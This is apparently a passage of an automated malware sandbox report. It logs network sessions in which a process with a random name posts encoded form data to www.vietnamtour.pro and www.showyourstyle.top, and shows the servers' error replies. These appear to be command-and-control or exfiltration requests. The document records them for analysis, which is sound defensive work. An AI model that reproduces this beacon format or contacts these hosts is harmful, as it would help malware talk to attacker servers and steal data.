                                                                              Data Raw: 69 72 43 78 6c 36 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 66 53 72 69 2b 32 45 54 6b 4b 41 6f 52 42 2f 77 74 33 68 66 56 39 71 33 77 77 56 72 2f 6f 4d 77 66 32 46 56 71 68 57 74 69 6e 4a 65 39 78 51 4e 4c 35 4a 78 2f 78 51 31 78 63 75 51 51 71 57 4d 47 44 59 61 30 62 56 72 66 30 6d 61 43 58 51 62 68 49 52 6e 78 50 35 4d 4c 6d 58 39 51 32 56 30 32 34 73 32 75 42 30 6f 6a 53 6c 54 43 34 58 4c 4d 4a 5a 55 33 32 35 71 4f 4a 73 6a 70 57 56 63 39 62 77 56 70 62 49 42 78 39 31 47 5a 72 62 36 74 39 42 47 45 58 70 43 6c 47 50 42 6a 39 45 4a 49 6b 74 53 4a 52 53 78 79 46 72 52 30 37 7a 6f 67 62 79 57 6b 35 69 72 4b 67 3d
                                                                              Data Ascii: irCxl6=+fxjh23YXcyEmfSri+2ETkKAoRB/wt3hfV9q3wwVr/oMwf2FVqhWtinJe9xQNL5Jx/xQ1xcuQQqWMGDYa0bVrf0maCXQbhIRnxP5MLmX9Q2V024s2uB0ojSlTC4XLMJZU325qOJsjpWVc9bwVpbIBx91GZrb6t9BGEXpClGPBj9EJIktSJRSxyFrR07zogbyWk5irKg=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.849718172.67.138.138805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:29.929508924 CET757OUTPOST /wmxx/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              Origin: http://www.vietnamtour.pro
                                                                              Referer: http://www.vietnamtour.pro/wmxx/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 38 4b 72 68 66 32 45 55 45 4b 48 6b 78 42 2f 35 4e 33 6c 66 56 42 71 33 31 55 46 72 4d 4d 4d 70 39 75 46 55 72 68 57 67 43 6e 4a 4b 74 78 56 53 62 35 43 78 2f 38 6a 31 7a 59 75 51 55 43 57 4d 48 7a 59 61 46 62 57 35 2f 30 65 52 69 58 65 57 42 49 52 6e 78 50 35 4d 49 62 38 39 51 2b 56 31 48 49 73 33 50 42 72 6b 44 53 6b 46 53 34 58 63 38 4a 64 55 33 32 62 71 4c 70 4b 6a 71 75 56 63 2f 7a 77 56 34 62 48 49 78 38 2b 4a 35 72 4a 37 38 45 6b 4d 6c 54 53 4c 55 2b 42 43 69 39 5a 49 2b 56 48 49 72 5a 55 79 79 74 41 52 33 54 46 74 58 47 61 4d 48 70 53 31 64 30 6b 45 75 75 6a 69 31 30 6c 4e 4b 63 2f 69 55 64 4f 58 79 57 77
                                                                              Data Ascii: irCxl6=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMMMp9uFUrhWgCnJKtxVSb5Cx/8j1zYuQUCWMHzYaFbW5/0eRiXeWBIRnxP5MIb89Q+V1HIs3PBrkDSkFS4Xc8JdU32bqLpKjquVc/zwV4bHIx8+J5rJ78EkMlTSLU+BCi9ZI+VHIrZUyytAR3TFtXGaMHpS1d0kEuuji10lNKc/iUdOXyWw


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.849719172.67.138.138805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:32.479824066 CET1774OUTPOST /wmxx/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              Origin: http://www.vietnamtour.pro
                                                                              Referer: http://www.vietnamtour.pro/wmxx/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 38 4b 72 68 66 32 45 55 45 4b 48 6b 78 42 2f 35 4e 33 6c 66 56 42 71 33 31 55 46 72 4d 45 4d 70 75 6d 46 56 49 5a 57 68 43 6e 4a 57 64 78 55 53 62 35 66 78 2f 6b 76 31 7a 46 5a 51 53 47 57 4d 68 6e 59 54 58 7a 57 67 50 30 65 4d 79 58 66 62 68 49 45 6e 78 65 77 4d 49 4c 38 39 51 2b 56 31 46 51 73 77 65 42 72 6d 44 53 6c 54 43 34 62 4c 4d 4a 31 55 7a 61 68 71 4c 6b 78 6a 61 4f 56 63 66 6a 77 47 2b 50 48 4a 52 38 38 49 35 71 61 37 39 34 33 4d 6c 66 65 4c 55 62 71 43 6c 78 5a 4b 37 67 4b 54 34 4a 69 6f 55 78 4b 58 48 54 74 6c 6e 4f 34 4c 6c 31 78 39 74 6b 48 4e 61 43 6f 6f 47 77 53 4e 4c 5a 30 2f 77 38 59 61 79 44 59 6c 64 2f 4c 51 6a 61 6a 78 45 37 38 71 39 2f 5a 44 66 46 46 71 79 4f 69 77 76 74 35 36 50 68 76 4f 54 4a 69 68 46 52 51 2f 48 6f 54 64 4b 51 6e 4a 4c 66 4b 6d 4f 34 39 42 76 44 50 4c 32 53 36 34 53 47 52 59 42 34 56 64 35 36 67 33 4b 78 42 4f 57 75 36 57 59 4a 6b 7a 76 35 33 51 4d 39 6d 53 58 56 52 6f 2b 49 31 59 47 49 77 38 6c 6f [TRUNCATED]
                                                                              Data Ascii: irCxl6=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMEMpumFVIZWhCnJWdxUSb5fx/kv1zFZQSGWMhnYTXzWgP0eMyXfbhIEnxewMIL89Q+V1FQsweBrmDSlTC4bLMJ1UzahqLkxjaOVcfjwG+PHJR88I5qa7943MlfeLUbqClxZK7gKT4JioUxKXHTtlnO4Ll1x9tkHNaCooGwSNLZ0/w8YayDYld/LQjajxE78q9/ZDfFFqyOiwvt56PhvOTJihFRQ/HoTdKQnJLfKmO49BvDPL2S64SGRYB4Vd56g3KxBOWu6WYJkzv53QM9mSXVRo+I1YGIw8loZMzFzvLOSYkntq3Pd/L8cf36ovY9qYryC5yCLqUQmzFNo7k6dMxiPQI9Y8LVHXlIY7Pgt/C8dLcH5zAg6VmaXoJ9X0YAEPeOw/qEXHrHFQ0SYIjkd+oGAN0+5Ij7aqgRcYzDmTzkTzaTQSViLVd6CpnMHrVfgT3RXnkJehEEBzAwqo0S7QvCq1DR5m0SAJQ/Dl6VJwq44ZOQoKi7Q7uaIp3wD5p3XRiEbgIZwrdoDINF0PWj6f1a/9RuzzRg1WHsmc+q595u9H/LFdHcURD5LxoIymqYymYq6UlJvWxSH9XhYZ5mU0VGlUUxoK+fHl2+JULaCIexaB1u7rTToWUQPncnExNLWYsFd4B13U0BcovCGTn90eQPjrIV5lc+KTtAaTr9kEco9/Fqph+mkt6SGED77xOlPXZWNcoVoAQv3n18oUsrRqU+YhsBgIDYhds6BMoOLf53MTewYsb47tNdg6PL6Qow0hyAKboLTWjjIcpSPbrGdXE0vkKppq1KZ4lzykn10SXpf3FwPx2jLXkucG1X3eAW3RcBzDVWwrdyrjMzwAjr/9PyLnQGP2WUHECBqMdtiZlwXp/aMUkkL+4WENHLEbr1D/eqVC6pkS2YnGtEJs32no2eGGVhey+YLqm8VjlRl480qaalJM3sjrfE6vD0yOc+8rYNL2 [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.849720172.67.138.138805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:35.017736912 CET471OUTGET /wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA== HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:55:14.926848888 CET968INHTTP/1.1 522
                                                                              Date: Fri, 10 Jan 2025 17:55:14 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 15
                                                                              Connection: close
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0YOPKzhNT4szNftQJsAZVquo287abPMqG%2F2D4qgb%2FmvKvOq4dWS61ilwyOu1GRaHE%2Bi%2BcY7FEV1k%2FRyWxsx3P6xxx%2FprC4YJ7OBlG%2BapuO1pMJN5R2lhuOcb3U5e6xwj3DAMoxU"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Referrer-Policy: same-origin
                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe887c8e690f83-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=74163&min_rtt=74163&rtt_var=37081&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                              Data Ascii: error code: 522


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.84972169.57.163.64805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:20.207743883 CET743OUTPOST /zbqa/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.showyourstyle.top
                                                                              Origin: http://www.showyourstyle.top
                                                                              Referer: http://www.showyourstyle.top/zbqa/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 76 72 67 58 6f 68 4e 72 59 31 38 46 42 54 7a 58 77 61 57 34 73 79 71 63 78 2b 6a 70 59 56 32 4c 46 62 30 74 59 72 4f 66 76 77 7a 6a 62 41 54 72 36 61 66 39 64 4b 63 63 49 4e 54 6f 38 59 65 70 38 68 78 56 47 42 48 75 67 35 55 79 4b 39 47 41 41 6f 65 49 36 4c 50 32 34 42 6a 45 53 68 65 58 47 6f 74 52 62 61 36 31 56 56 4e 67 4d 66 50 6d 51 67 58 32 34 4a 76 4a 4d 62 68 56 46 36 68 38 39 37 2b 32 6b 32 61 69 75 4e 33 53 7a 76 61 35 62 52 62 6f 42 42 79 4b 43 59 76 72 4d 35 4a 48 36 32 75 76 6f 4e 6b 77 54 7a 33 66 6e 42 47 61 36 58 71 5a 42 6f 36 65 2b 4d 3d
                                                                              Data Ascii: irCxl6=YJXb98DVW6x1mvrgXohNrY18FBTzXwaW4syqcx+jpYV2LFb0tYrOfvwzjbATr6af9dKccINTo8Yep8hxVGBHug5UyK9GAAoeI6LP24BjESheXGotRba61VVNgMfPmQgX24JvJMbhVF6h897+2k2aiuN3Szva5bRboBByKCYvrM5JH62uvoNkwTz3fnBGa6XqZBo6e+M=
                                                                              Jan 10, 2025 18:55:20.841234922 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Fri, 10 Jan 2025 17:55:20 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.84972269.57.163.64805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:22.757997036 CET763OUTPOST /zbqa/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.showyourstyle.top
                                                                              Origin: http://www.showyourstyle.top
                                                                              Referer: http://www.showyourstyle.top/zbqa/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 50 62 67 56 50 31 4e 36 34 31 37 41 42 54 7a 59 51 61 53 34 73 2b 71 63 77 36 7a 71 71 68 32 4c 6b 4c 30 75 5a 72 4f 50 2f 77 7a 33 4c 41 57 6f 4b 61 75 39 64 32 55 63 4d 52 54 6f 38 63 65 70 34 6c 78 56 58 42 45 38 41 35 57 6e 61 38 67 66 51 6f 65 49 36 4c 50 32 34 6b 4f 45 53 35 65 58 79 55 74 52 36 61 35 38 31 56 43 6e 4d 66 50 33 41 67 4d 32 34 4a 4e 4a 4e 57 70 56 47 53 68 38 38 4c 2b 32 78 61 5a 33 2b 4e 39 57 7a 75 64 77 49 6b 45 6e 41 4d 51 47 67 4e 50 79 2b 6b 7a 47 4d 48 45 31 4b 46 69 7a 54 62 63 66 6b 70 77 66 4e 4b 43 44 69 34 4b 41 70 59 53 35 36 6a 32 34 34 6e 35 72 79 52 63 76 33 6d 2b 74 6d 71 6a
                                                                              Data Ascii: irCxl6=YJXb98DVW6x1mPbgVP1N6417ABTzYQaS4s+qcw6zqqh2LkL0uZrOP/wz3LAWoKau9d2UcMRTo8cep4lxVXBE8A5Wna8gfQoeI6LP24kOES5eXyUtR6a581VCnMfP3AgM24JNJNWpVGSh88L+2xaZ3+N9WzudwIkEnAMQGgNPy+kzGMHE1KFizTbcfkpwfNKCDi4KApYS56j244n5ryRcv3m+tmqj
                                                                              Jan 10, 2025 18:55:23.387659073 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Fri, 10 Jan 2025 17:55:23 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.84972369.57.163.64805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:25.308222055 CET1780OUTPOST /zbqa/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.showyourstyle.top
                                                                              Origin: http://www.showyourstyle.top
                                                                              Referer: http://www.showyourstyle.top/zbqa/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 59 4a 58 62 39 38 44 56 57 36 78 31 6d 50 62 67 56 50 31 4e 36 34 31 37 41 42 54 7a 59 51 61 53 34 73 2b 71 63 77 36 7a 71 71 35 32 4b 55 58 30 74 36 7a 4f 64 76 77 7a 6f 37 41 58 6f 4b 61 7a 39 64 65 51 63 4d 63 6d 6f 2b 55 65 71 62 74 78 43 56 35 45 6c 77 35 57 6c 61 38 30 41 41 6f 50 49 36 62 4c 32 34 30 4f 45 53 35 65 58 30 77 74 59 4c 61 35 2b 31 56 4e 67 4d 66 54 6d 51 68 43 32 34 42 33 4a 4e 43 35 4a 6d 79 68 38 63 62 2b 31 44 69 5a 32 65 4e 7a 52 7a 75 2f 77 49 34 68 6e 41 52 68 47 69 73 59 79 38 30 7a 48 4a 79 43 6e 5a 6c 56 6f 54 66 6f 51 6b 52 79 51 2f 4b 38 4a 55 38 59 44 36 73 64 76 4b 33 5a 2f 6f 37 73 6a 56 52 53 7a 6a 53 54 74 44 71 33 4e 62 33 39 68 71 4c 4e 2b 62 6e 74 32 6f 7a 63 35 6a 4c 2b 4c 55 50 4e 44 72 4e 76 6d 64 78 61 4a 65 54 67 70 73 37 52 47 58 68 58 2f 67 45 4f 54 2f 4d 58 59 49 4d 61 49 6f 2b 4e 4d 6f 34 46 31 7a 62 2b 49 4b 51 49 6a 46 38 38 4d 38 44 55 34 7a 76 67 64 58 57 62 45 73 73 2f 6e 5a 4f 4b 76 62 34 33 42 74 4f 63 30 4c 52 76 2f 32 39 [TRUNCATED]
                                                                              Data Ascii: irCxl6=YJXb98DVW6x1mPbgVP1N6417ABTzYQaS4s+qcw6zqq52KUX0t6zOdvwzo7AXoKaz9deQcMcmo+UeqbtxCV5Elw5Wla80AAoPI6bL240OES5eX0wtYLa5+1VNgMfTmQhC24B3JNC5Jmyh8cb+1DiZ2eNzRzu/wI4hnARhGisYy80zHJyCnZlVoTfoQkRyQ/K8JU8YD6sdvK3Z/o7sjVRSzjSTtDq3Nb39hqLN+bnt2ozc5jL+LUPNDrNvmdxaJeTgps7RGXhX/gEOT/MXYIMaIo+NMo4F1zb+IKQIjF88M8DU4zvgdXWbEss/nZOKvb43BtOc0LRv/292wOsX9nIgYURyTIJbOlDbpBMViXYHw4CQaAqdnVcg3CL7SS0VgUH2pVU9E6iO6Jxb5hYu764Nx8QytBZ21tfqzLC0g/HerOMACDaHMpOxgw1jPLe2ahTbUDebIoX/NvgzLxVAqIz86V+o4aD5lynQisxiy5W3qdY4h2MJbyZpmWV8P6GUNv3V8/510VRgfdnChgaAgqoBeKNyHggX2HoGFtbhYGgJ00zDpk8yABqdYt/8pjNxgLITUNCT7Pip/Re3Brn/+vBnMAiM/HLsAD64BEeGFpd+bBsZ5TrzcldsRYlEjkdJsl3CGGK9RDyWqteyj4RF6rGhxIUbkxsfFrYXIr2dqixCPAUQMvGjQrDYoUmQaogBAiIlx9fqGybxUY2xypYk3iDW+Y3UULhqcXxtyhKGsNWCqRyLp8RNOMKT7mtJmgNNLugAqilfWPWxNkD9pEGEr7W3C9W39cAaepkNR8JkTxtWe6pG2zlzOX8AmctgtDzuxudqzCqDPO066dZ2sJ/dtMBHpkcWszQ8bk/zhYKLrieXPRDT8d5qtz1qF406XnU3Bm9K1ngPhPAyxjVaaXBZudHLuGAMtvqjLqalxfT3QkS8NNt4uJG4nCFnf49q9VxZ/LAbVA0HmRwiDgoeoS3oRcjh0rqypJQyGiPOb2yVCOfNjnomC [TRUNCATED]
                                                                              Jan 10, 2025 18:55:25.919161081 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Fri, 10 Jan 2025 17:55:25 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.84972469.57.163.64805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:55:27.850214958 CET473OUTGET /zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.showyourstyle.top
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:55:28.457796097 CET548INHTTP/1.1 404 Not Found
                                                                              Date: Fri, 10 Jan 2025 17:55:28 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
